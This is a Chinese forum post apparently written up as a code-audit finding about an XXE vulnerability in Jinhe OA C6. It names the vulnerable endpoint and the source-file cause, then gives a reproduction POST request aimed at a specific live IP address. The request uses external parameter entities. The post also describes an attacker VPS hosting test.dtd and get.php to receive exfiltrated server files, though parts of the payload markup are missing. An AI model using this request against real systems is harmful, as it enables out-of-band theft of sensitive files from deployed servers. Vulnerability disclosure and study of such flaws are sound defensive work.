盒盒
发布于 IP属地湖北省

金和OA存在前台XML实体注入漏洞

记一次代审

金和OA存在前台XML实体注入漏洞
一、 资产归属

二、 漏洞描述
金和OA系统产品C6协同管理平台共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,涵盖了企业业务运营管理的各个方面。
金和OA-C6存在前台XML实体注入漏洞,攻击者可利用该漏洞获取服务器敏感文件信息。
三、 漏洞位置
/AS/Jhsoft.Web.module/ToolBar/CheckRole.aspx/
四、 代码分析
漏洞发生在

JHSoft.Web.Module\JHSoft.Web.Module.ToolBar\CheckRole.cs
该系统默认版本环境下XmlDocument.Load会启用外部实体解析,
调用Load方法触发XXE漏洞,且传入值用户可控

五、 漏洞复现
http://117.50.57.40/

POST /AS/Jhsoft.Web.module/ToolBar/CheckRole.aspx/ HTTP/1.1
Host: 117.50.57.40:70
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/css,/;q=0.1
Referer: http://117.50.57.40/AS/Jhsoft.Web.login/PassWordSlideFull.aspx
Accept-Encoding: gzip, deflate, br
Cookie: myie=false; ASP.NET_SessionId=brdyqi4433qhf23temmsyeao
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 196

%remote;
%all;
]>
&send;

VPS创建2个文件分别为test.dtd 和 get.php放到同个文件夹下,开启WEB服务

test.dtd:

">

get.php

漏洞分析
浏览 (101)
点赞
收藏
打赏
评论